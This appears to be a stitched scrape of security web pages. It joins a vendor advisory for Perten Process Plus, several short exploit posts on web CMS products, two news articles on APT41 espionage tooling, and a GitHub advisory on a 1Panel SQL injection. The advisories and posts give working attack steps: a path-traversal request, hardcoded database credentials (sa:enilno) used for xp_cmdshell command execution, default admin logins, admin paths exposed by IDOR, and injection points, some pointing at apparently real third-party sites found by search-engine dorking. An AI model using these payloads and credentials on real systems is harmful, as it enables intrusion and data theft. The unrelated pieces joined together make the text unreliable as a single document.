Perten Instruments Process Plus Software versions 1.11.6507.0 and below suffer from local file inclusion, hardcoded credential, and execution with unnecessary privilege vulnerabilities.

    CyberDanube Security Research 20240722-0-------------------------------------------------------------------------------                title| Multiple Vulnerabilities              product| Perten Instruments Process Plus Software   vulnerable version| <=1.11.6507.0        fixed version| 2.0.0           CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913               impact| High             homepage| https://perkinelmer.com                found| 2024-04-24                   by| S. Dietz, T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"For 85 years, PerkinElmer has pushed the boundaries of science from food tohealth to the environment. We’ve always pursued science with a clear purpose –to help our customers achieve theirs. Our expert team brings technology andintangibles, like creativity, empathy, diligence, and a spirit ofcollaboration, in equal measure, to fulfill our customers’ desire to workbetter, innovate better, and create better.PerkinElmer is a leading, global provider of technology and service solutionsthat help customers measure, quantify, detect, and report in ways that helpensure the quality, safety, and satisfaction of their products."Source: https://www.perkinelmer.com/Vulnerable versions-------------------------------------------------------------------------------ProcessPlus Software / <=1.11.6507.0Vulnerability overview-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)A LFI was identified in the web interface of the device. An attacker can usethis vulnerability to read system-wide files and configuration.2) Hardcoded MSSQL Credentials (CVE-2024-6912)The software is using the same MSSQL credentials across multiple installations.In combination with 3), this allows an attacker to fully compromise the host.3) Execution with Unnecessary Privileges (CVE-2024-6913)The software uses the user "sa" to connect to the database. Access to thisaccount allows an attacker to execute commands via the "xp_cmdshell" procedure.Proof of Concept-------------------------------------------------------------------------------1) Unauthenticated Local File Inclusion (CVE-2024-6911)The LFI can be triggered by using the following GET Request:-------------------------------------------------------------------------------GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1Host: 192.168.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests: 1-------------------------------------------------------------------------------This example returns the content from "C:\Windows\System32\drivers\etc\hosts"of an affected installation.2) Hardcoded MSSQL Credentials (CVE-2024-6912)Analysis across multiple installations show that the configuration file"\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials:-------------------------------------------------------------------------------[...]<OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL;DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1"appid="Perten.OPCDA.Server" loglevel="info"logfile="C:\Perten\ProcessPlus\Log\opcserver.log">[...]-------------------------------------------------------------------------------These credentials "sa:enilno" were re-used in all reviewed installations.3) Execution with Unnecessary Privileges (CVE-2024-6913)The application uses the "sa" user to authenticate with the database. By usingMetasploit an attacker can execute arbitrary commands:-------------------------------------------------------------------------------msf6 auxiliary(admin/mssql/mssql_exec) > show optionsModule options (auxiliary/admin/mssql/mssql_exec):   Name                 Current Setting   ----                 ---------------   CMD                  dir   PASSWORD             enilno   RHOSTS               192.168.0.1   RPORT                1433   TDSENCRYPTION        false   TECHNIQUE            xp_cmdshell   USERNAME             sa   USE_WINDOWS_AUTHENT  falsemsf6 auxiliary(admin/mssql/mssql_exec) > run[*] Running module against 192.168.0.1[*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir'[...] Directory of C:\Windows\system32 01/23/2024  13:37 AM    <DIR>          . 01/23/2024  13:37 AM    <DIR>          .. 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM    <DIR>          0123 01/23/2024  13:37 AM               232 @AppHelpToast.png 01/23/2024  13:37 AM               308 @AudioToastIcon.png[...]Solution-------------------------------------------------------------------------------Update to version 2.0.0.Workaround-------------------------------------------------------------------------------Restrict network access to the host with the installed software. Change thedefault credentials of the database in the config file and the database itself.Recommendation-------------------------------------------------------------------------------CyberDanube recommends Perten customers to upgrade the software to the latestversion available and to restrict network access to the management interface.Contact Timeline-------------------------------------------------------------------------------2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.2024-05-13: Vendor asked for unencrypted advisory.2024-05-16: Sent advisory to vendor.2024-05-22: Asked for status update. No answer.2024-05-28: Asked for status update. Contact stated that they are working on a            fix.2024-06-10: Asked for status update. Contact stated that all issues should be            fixed by end of month. Local file inclusion should be fixed in            version 1.16. Asked for a release date of version 1.16. No answer.2024-07-13: Asked for status update.2024-07-15: Contact stated, that all three issues have been fixed in version            2.0.0 which have been released on 2024-07-11.2024-07-16: Asked for a link to the firmware update release.2024-07-17: Set release date to 2024-07-22.2024-07-22: Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF S. Dietz, T. Weber / @2024

Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

**LMS ZAI 6.1 Insecure Settings**

Posted Jul 23, 2024

Authored by indoushka

LMS ZAI version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ac6f91ffe20c571e57ac0c8a6aef0c5437b2d37e5f53c46ef41059f24100b7db

Download | Favorite | View

**LMS ZAI 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : LMS ZAI v6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/lmszai-learning-management-system/38383087                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@gmail.com & pass = 123456[+] https://www/127.0.0.1/www.mylmsin/admin/dashboardGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

LMS ZAI 6.1 Insecure Settings

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

**Quick Job 2.4 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

Quick Job version 2.4 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | ed619defcb18f94880d7fdc150758b05fc052d89b88cf6c32eda99ac714a326b

Download | Favorite | View

**Quick Job 2.4 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Quick Job v2.4 IDOR Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://bylancer.com/demo/quickjob/                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : //admin/header.php[+] https://www/127.0.0.1/newjobcartcom/admin/header.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Quick Job 2.4 Insecure Direct Object Reference

Minfotech CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Minfotech CMS v2.0 Sql injection Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://minfotech.in/AboutUs                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /project_list?name=stretch_films <===== inject here[+] https://www/127.0.0.1/shivexportnavsaricom/project_list?name=stretch_films[+] Login : /admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Minfotech CMS 2.0 SQL Injection

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

**eDesign CMS 2.0 Insecure Direct Object Reference**

Posted Jul 23, 2024

Authored by indoushka

eDesign CMS version 2.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 55a4eca00e7267d8d4d5cdd94c2b99447eef8059c06cab914a3401ebda7966f2

Download | Favorite | View

**eDesign CMS 2.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : eDesign CMS v2.0 IDOR Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/register[+] https://www/127.0.0.1/yenpresscom/admin/registerGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,069)
*   Arbitrary (16,824)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,777)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,989)
*   Encryption (2,389)
*   Exploit (53,058)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,164)
*   Local (14,773)
*   Magazine (586)
*   Overflow (13,148)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,604)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,022)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,585)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,895)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,465)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,354)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,678)
*   UNIX (9,430)
*   UnixWare (187)
*   Windows (6,667)
*   Other

eDesign CMS 2.0 Insecure Direct Object Reference

eStore CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : eStore CMS v2.0 Sql injection Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://www.2iraq.com/                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : "CMS.php?CMS_P=" or "News_Details.php?ID="<===== inject here[+] https://www/127.0.0.1/uruk.edu.iq/News_Details.php?ID=467Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

eStore CMS 2.0 SQL Injection

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

**Agop CMS 1.0 Insecure Direct Object Reference**

Posted Jul 22, 2024

Authored by indoushka

Agop CMS version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 1ed22de09e417dcaed8d9f03d8d62abd6b70fc4587552e70a4bdbce253d3011b

Download | Favorite | View

**Agop CMS 1.0 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Agop CMS v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : http://gico.io/agop/demos/                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/managePages.php[+] https://www/127.0.0.1/tiktrades.com/admin/managePages.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,061)
*   Arbitrary (16,823)
*   BBS (2,859)
*   Bypass (1,852)
*   CGI (1,033)
*   Code Execution (7,776)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (24,985)
*   Encryption (2,389)
*   Exploit (53,050)
*   File Inclusion (4,256)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,875)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,161)
*   Local (14,770)
*   Magazine (586)
*   Overflow (13,147)
*   Perl (1,435)
*   PHP (5,219)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,629)
*   Remote (31,602)
*   Root (3,625)
*   Rootkit (525)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,021)
*   Shell (3,270)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,584)
*   TCP (2,439)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,893)
*   Web (9,947)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,234)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (376)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,082)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,531)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,456)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,351)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,673)
*   UNIX (9,429)
*   UnixWare (187)
*   Windows (6,667)
*   Other

Agop CMS 1.0 Insecure Direct Object Reference

According to Mandiant, among the many cyber espionage tools the threat actor is using is a sophisticated new dropper called DustTrap.

Source: Travel mania via Shutterstock

One of China's more prolific threat groups, APT41, is carrying out a sustained cyber espionage campaign targeting organizations in multiple sectors, including global shipping and logistics, media and entertainment, technology, and the automotive industry.

The advanced persistent threat (APT) actor appears to have launched the new campaign sometime in early 2023. Since then, the group has successfully infiltrated multiple victim networks and maintained prolonged access on them, Google's Mandiant security group said this week in a joint analysis with Google's Threat Analysis Group (TAG). Most of the affected organizations are located in the United Kingdom, Italy, Spain, Taiwan, Thailand, and Turkey.

APT41 is sort of an umbrella descriptor for a collective of China-based threat actors engaged in cyber espionage, supply chain attacks, and financially motivated cybercrime around the globe since at least 2012. Over the years security researchers have identified multiple subgroups as being part of the APT41 collective, including Wicked Panda, Winnti, Suckfly, and Barium. These groups have stolen trade secrets, intellectual property, healthcare related data and other sensitive information from US organizations and entities around the word on behalf of the Chinese government. In 2020, the US government indicted five members of APT41 for participating in or contributing to attacks on more than 100 companies worldwide. Those charges have done little to deter the group's activities so far, however.

**APT41's Widespread Geographic Impact**

Nearly all but one of the targeted organizations in the shipping and logistics sector were based in the Middle East and Europe, while all organizations that APT41 targeted in the media and entertainment sector were located in Asia. Many victims within the shipping and logistics sectors have operations across multiple continents, either as subsidiaries or affiliates of large multinational companies in the same sector, Mandiant researchers said.

"An analysis of victim organizations within specific sectors reveals a notable geographic distribution," Mandiant researchers said in its blog post.

Further, "Mandiant has detected reconnaissance activity directed towards similar organizations operating within other countries such as Singapore," the security vendor wrote. "At the time of the publication, neither Mandiant nor Google TAG have any indicators of these organizations being compromised by APT41, but it could potentially indicate an expanded scope of targeting."

**Custom Cyber Espionage Tools**

Mandiant researchers also said it had observed APT41 actors using a range of custom tools in its ongoing campaign, including those for dropping malware on target systems, establishing backdoors, moving laterally in compromised networks, and exfiltrating data from them. The tools include two Web shells for persistence, called AntsWord and BlueBeam, which the threat actor has been using to download a dropper called DustPan, which in turn attempts to load the Beacon post-compromise tool on victim systems.

In addition to this, Mandiant said it observed APT41 use a hitherto unseen multi-stage plugin framework called DustTrap for decrypting malicious payloads and executing them in memory so as to enable communication between the compromised system and APT-41 controlled systems and infrastructure. "DustPan has been used by APT41 as far back as 2021, but DustTrap was first seen in this activity," says Ben Read, head of cyber espionage analysis at Mandiant.

Other tools that APT41 actors have effectively deployed in the current campaign include malware dubbed SQLULDR2 for copying data from Oracle Databases and PineGrove for exfiltrating large volumes of data from a compromised network to a OneDrive account for subsequent analysts.

"APT41 has always had a global mandate, so while their targeting in this campaign likely reflects current PRC priorities, the widespread nature is consistent with what we have seen previously from them," Read says.

So far, Mandiant has found no evidence to suggest that APT41 are seeking to monetize their attacks in the current campaign in any way. "However, we do not have full insight into the post compromise activity, so can't say for sure."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

China's APT41 Targets Global Logistics, Utilities Companies

Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based APT41 hacking group.
"APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since

Several organizations operating within global shipping and logistics, media and entertainment, technology, and automotive sectors in Italy, Spain, Taiwan, Thailand, Turkey, and the U.K. have become the target of a "sustained campaign" by the prolific China-based **APT41** hacking group.

"APT41 successfully infiltrated and maintained prolonged, unauthorized access to numerous victims' networks since 2023, enabling them to extract sensitive data over an extended period," Google-owned Mandiant said in a new report published Thursday.

The threat intelligence firm described the adversarial collective as unique among China-nexus actors owing to its use of "non-public malware typically reserved for espionage operations in activities that appear to fall outside the scope of state-sponsored missions."

Attack chains involve the use of web shells (ANTSWORD and BLUEBEAM), custom droppers (DUSTPAN and DUSTTRAP), and publicly available tools (SQLULDR2 and PINEGROVE) to achieve persistence, deliver additional payloads, and exfiltrate data of interest.

The web shells act as a conduit to download the DUSTPAN (aka StealthVector) dropper that's responsible for loading Cobalt Strike Beacon for command-and-control (C2) communication, followed by the deployment of the DUSTTRAP dropper post lateral movement.

DUSTTRAP, for its part, is configured to decrypt a malicious payload and execute it in memory, which, in turn, establishes contact with an attacker-controlled server or a compromised Google Workspace account in an attempt to conceal its malicious activities.

Google said the identified Workspace accounts have been remediated to prevent unauthorized access. It, however, did not reveal how many accounts were affected.

The intrusions are also characterized by the use of SQLULDR2 to export data from Oracle Databases to a local text-based file and PINEGROVE to transmit large volumes of sensitive data from compromised networks by abusing Microsoft OneDrive as an exfiltration vector.

It's worth noting here that the malware families that Mandiant tracks as DUSTPAN and DUSTTRAP share overlaps with those that have been codenamed DodgeBox and MoonWalk, respectively, by Zscaler ThreatLabz.

"DUSTTRAP is a multi-stage plugin framework with multiple components," Mandiant researchers said, adding it identified at least 15 plugins that are capable of executing shell commands, carrying out file system operations, enumerating and terminating processes, capturing keystrokes and screenshots, gathering system information, and modifying Windows Registry.

It's also engineered to probe remote hosts, perform domain name system (DNS) lookups, list remote desktop sessions, upload files, and conduct various manipulations to Microsoft Active Directory.

"The DUSTTRAP malware and its associated components that were observed during the intrusion were code signed with presumably stolen code signing certificates," the company said. "One of the code signing certificates seemed to be related to a South Korean company operating in the gaming industry sector."

**GhostEmperor Comes Back to Haunt**

The disclosure comes as Israeli cybersecurity company Sygnia revealed details of a cyber attack campaign mounted by a sophisticated China-nexus threat group called GhostEmperor to deliver a variant of the Demodex rootkit.

The exact method used to breach targets is currently not clear, although the group has been previously observed exploiting known flaws in internet-facing applications. The initial access facilitates the execution of a Windows batch script, which drops a Cabinet archive (CAB) file to ultimately launch a core implant module.

The implant is equipped to manage C2 communications and install the Demodex kernel rootkit by using an open-source project named Cheat Engine to get around the Windows Driver Signature Enforcement (DSE) mechanism.

"GhostEmperor employs a multi-stage malware to achieve stealth execution and persistence and utilizes several methods to impede analysis process," Security researcher Dor Nizar said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

APT41 Infiltrates Networks in Italy, Spain, Taiwan, Turkey, and the U.K.

### Summary
There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.
The proof is as follows

### Details （one of them ）
<img width="697" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/895b7b43-9bc0-44b3-9c84-24c2dcc962da">
<img width="936" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/1b8eb866-9865-4bef-a359-53335d709157">
<img width="684" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/e865d6d0-7ecb-49f7-b4a2-f1b0bc407986">


### PoC
curl 'http://api:30455/api/v1/hosts/command/search' {"page":1,"pageSize":10,"groupID":0,"orderBy":"**3**","order":"ascending","name":"a"}
<img width="664" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/250d5a2a-cb32-44dc-9831-86dbc2f2b43f">
for example as picture . just change orderby‘s num we can know How many columns does the data table have.Parameters require strict whitelist filtering

### Impact
RCE、data leak.


1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-39907

**1Panel has an SQL injection issue related to the orderBy clause**

Critical severity GitHub Reviewed Published Jul 18, 2024 in 1Panel-dev/1Panel • Updated Jul 18, 2024

**Package**

gomod github.com/1Panel-dev/1Panel (Go)

**Affected versions**

< 1.10.12-tls

**Patched versions**

1.10.12-tls

**Summary**

There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.  
The proof is as follows

**Details （one of them ）**

**PoC**

curl 'http://api:30455/api/v1/hosts/command/search' {"page":1,"pageSize":10,"groupID":0,"orderBy":"**3**","order":"ascending","name":"a"}  
  
for example as picture . just change orderby‘s num we can know How many columns does the data table have.Parameters require strict whitelist filtering

**Impact**

RCE、data leak.

**References**

*   GHSA-5grx-v727-qmq6
*   1Panel-dev/1Panel@ff549a4

Published to the GitHub Advisory Database

Jul 18, 2024

Last updated

Jul 18, 2024

Tag

#sql